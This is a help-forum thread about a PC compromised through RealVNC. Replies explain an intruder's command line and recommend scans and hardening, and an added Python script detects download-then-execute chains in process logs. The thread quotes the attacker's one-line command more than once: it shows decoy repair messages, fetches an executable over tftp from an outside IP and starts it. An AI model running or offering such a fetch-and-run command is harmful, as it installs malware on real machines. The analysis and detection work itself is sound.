
What is this cmdline attempting to do?

Hi,

We recently had a PC hacked via RealVNC. The hacker executed the following command line.

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 81.88.110.178 GET cffhvvct.exe & start cffhvvct&

Can anyone explain what this has done?

Regards

Rob
Asked by: ertnev74
5 Solutions
 
Richard Quadling, Senior Software Developer, commented:
%comspec%

This is telling the computer to run the command shell as identified by %COMSPEC%.

At the DOS prompt, type SET and press Enter and you will see COMSPEC.
Normally cmd.exe or (on older Windows) command.com.

/c

Tells the comspec to run a command and then quit.

echo Repairing user32.dll

Output to the screen.

&
echo Please wait...

Output to the screen.

tftp -i 81.88.110.178 GET cffhvvct.exe

Use the program tftp to get a file called cffhvvct.exe from the IP address 81.88.110.178.

start cffhvvct

Run the program just downloaded.

If you don't know the name of the program or the FTP site, don't run it.

I've just tried downloading the file from that site but it timed out.

If it was a virus, then the site may have been blocked or something else.
0
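The breakdown above is exactly what a defender would want a detection to reproduce automatically: split the chain on cmd.exe's `&` separator, recognise the decoy `echo` lines, the `tftp ... GET` fetch and the `start` of the file that was just fetched. The following is an added example (Python, not code from the original thread or from any of the products mentioned) that does this over a few constructed Sysmon-style process-creation log lines; the log layout, the `192.0.2.10` host and the `firmware.bin` entry are invented for the demonstration, while the first command line is the one quoted in the question.

```python
"""Flag a 'download, then execute' chain in Windows command lines (added example)."""
import re

# Constructed log lines in a simplified key=value layout (not from the original
# post); only the first CommandLine is the one quoted in the question.
SAMPLE_LOGS = [
    'EventID=1 Image=C:\\Windows\\System32\\cmd.exe CommandLine="%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 81.88.110.178 GET cffhvvct.exe & start cffhvvct&"',
    'EventID=1 Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe /c dir C:\\temp & echo done"',
    'EventID=1 Image=C:\\Windows\\System32\\tftp.exe CommandLine="tftp -i 192.0.2.10 GET firmware.bin C:\\temp\\firmware.bin"',
]

SHELLS = {"%comspec%", "cmd", "cmd.exe"}
CMDLINE_RE = re.compile(r'CommandLine="(.*)"\s*$')


def split_commands(cmdline):
    """Split on cmd.exe's '&' separator, ignoring '&' inside double quotes.

    The trailing '&' in the question's command line leaves an empty segment,
    which is dropped.
    """
    parts, buf, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        if ch == "&" and not quoted:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def strip_shell_prefix(cmd):
    """Drop a leading '%comspec% /c' or 'cmd.exe /c' so the real command is visible."""
    tokens = cmd.split()
    if tokens and tokens[0].lower() in SHELLS:
        tokens = tokens[1:]
        while tokens and tokens[0].lower() in ("/c", "/k"):
            tokens = tokens[1:]
    return " ".join(tokens)


def parse_tftp_get(cmd):
    """Return (host, remote_file) for 'tftp [-i] host GET source [dest]', else None."""
    tokens = cmd.split()
    if not tokens or tokens[0].lower() not in ("tftp", "tftp.exe"):
        return None
    positional = [t for t in tokens[1:] if not t.startswith("-")]  # [host, verb, source, dest?]
    if len(positional) >= 3 and positional[1].lower() == "get":
        return positional[0], positional[2]
    return None


def parse_start_target(cmd):
    """Return the program launched by 'start [switches] program', else None.

    Simplified: switches that take an argument (such as /d) are not modelled.
    """
    tokens = cmd.split()
    if not tokens or tokens[0].lower() != "start":
        return None
    for tok in tokens[1:]:
        if tok.startswith("/") or tok.startswith('"'):
            continue  # start's own switches or a quoted window title
        return tok
    return None


def stem(name):
    """Lower-cased file name without directory or extension: 'cffhvvct.exe' -> 'cffhvvct'."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[0].lower() if "." in base else base.lower()


def analyze(cmdline):
    """Break a command line into stages and flag a download-then-execute chain."""
    segments = split_commands(cmdline)
    if segments:
        segments[0] = strip_shell_prefix(segments[0])
    result = {"decoy_messages": [], "downloads": [], "executed": [], "download_then_execute": False}
    for seg in segments:
        if seg.lower().startswith("echo "):
            result["decoy_messages"].append(seg[5:])
        fetched = parse_tftp_get(seg)
        if fetched:
            result["downloads"].append(fetched)
        target = parse_start_target(seg)
        if target:
            result["executed"].append(target)
    fetched_stems = {stem(f) for _, f in result["downloads"]}
    # The chain is suspicious only when what was started is what was just fetched.
    result["download_then_execute"] = any(stem(p) in fetched_stems for p in result["executed"])
    return result


def scan_logs(lines):
    """Return [(line_number, analysis)] for log lines that chain a download and its execution."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = CMDLINE_RE.search(line)
        if m:
            verdict = analyze(m.group(1))
            if verdict["download_then_execute"]:
                hits.append((lineno, verdict))
    return hits


if __name__ == "__main__":
    for lineno, verdict in scan_logs(SAMPLE_LOGS):
        host, fname = verdict["downloads"][0]
        print(f"line {lineno}: fetched {fname} from {host} via tftp, then started {verdict['executed']}")
        print("  decoy messages shown to the user:", verdict["decoy_messages"])
```

Only the first constructed line is flagged: the third line fetches a file over tftp but never starts it, and the second neither downloads nor starts anything. The decoy messages are kept in the result because "Repairing user32.dll" is the part a user actually sees, and it is what made the activity look like maintenance rather than an intrusion.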
 
kamleshgwalani commented:
Dear ertnev74,

A few weeks ago I got the same issue via VNC. It basically tries to dump 1.exe or 2.exe, which is a trojan. Basically, search the computer for viruses and try to search for 1.exe.

You can manually end the process, rename it and later delete it.

Run good antivirus software like Window Live Care or E-Wido.

Read some more info
http://en.wikipedia.org/wiki/ComSpec
http://www.liutilities.com/products/wintaskspro/processlibrary/1/
0
 
Richard Quadling, Senior Software Developer, commented:
OK. Having read the question again.

Without having access to the program itself, absolutely ANYTHING could have happened.

I would STRONGLY recommend disconnecting the PC from the LAN and running virus scanners and rootkit scanners.

Sysinternals Process Explorer (to see what is currently running and make sure YOU know it should be running).
Sysinternals RootkitRevealer (to see if any rootkits exist).
Sysinternals Autoruns (to see what is launched when the computer is turned on or when you log in).
HijackThis is a similar program to Autoruns, but produces a report which others can look at (http://www.spywareinfo.com/~merijn/programs.php).
0

 
rpggamergirl commented:
You could also try running some free scanners.
SUPERAntispyware:
http://www.superantispyware.com/

Download and install DrWebCureIt
http://www.freedrweb.com/

AVG Antispyware:
http://free.grisoft.com/doc/download-free-anti-spyware/us/frt/0


OR, run Combofix and upload the log for us to check.
Download ComboFix to your Desktop, from either of these locations:
http://www.techsupportforum.com/sectools/sUBs/ComboFix.exe
http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Double click "combofix.exe" and follow the prompts.
When finished, it shall produce a log for you.
Upload the log at EE-Stuff.com for us to check please.
0
 
kamleshgwalani commented:
Sorry, forgot to mention: always make sure that your firewall is turned on.
Or VNC should only be enabled as and when required.
If you can change the default port, i.e. 5900, to some other port, that would be helpful too, as this port is well known to hackers, so they just scan the port and enter through it.
I need this same thing with our guys and it solved my problem.

Now, since the program has been executed on your machine, better run a virus/spyware/trojan scan and then do the needful as above.
0
 
kamleshgwalani commented:
So what's the problem? Were you able to find 1.exe?
0
 
ertnev74 (Author) commented:
All, thanks for your assistance with this query.

The user saw some activity on his screen last Thursday around midday. I advised him to shut off his router. When I got to his PC he explained what he had seen. Clicking on Start > Run I found the above cmdline.

I looked up 'VNC being hacked' on EE and found a few solutions to rectify the situation. Once I made the box secure by running spyware / AV / process scanners, I then looked at the cause and possible damage.
The cmdline was the only thing I didn't understand.... but I do now :)

The AV scan removed a few trojans and viruses so I'm not too sure if 1.exe was on the box, however I was able to trace the IP of the hacker back to America.

Thanks again.
0
 
kamleshgwalani commented:
Thanks for the valuable feedback. The best is to keep your Windows firewall ON and keep Windows patched!!!!
0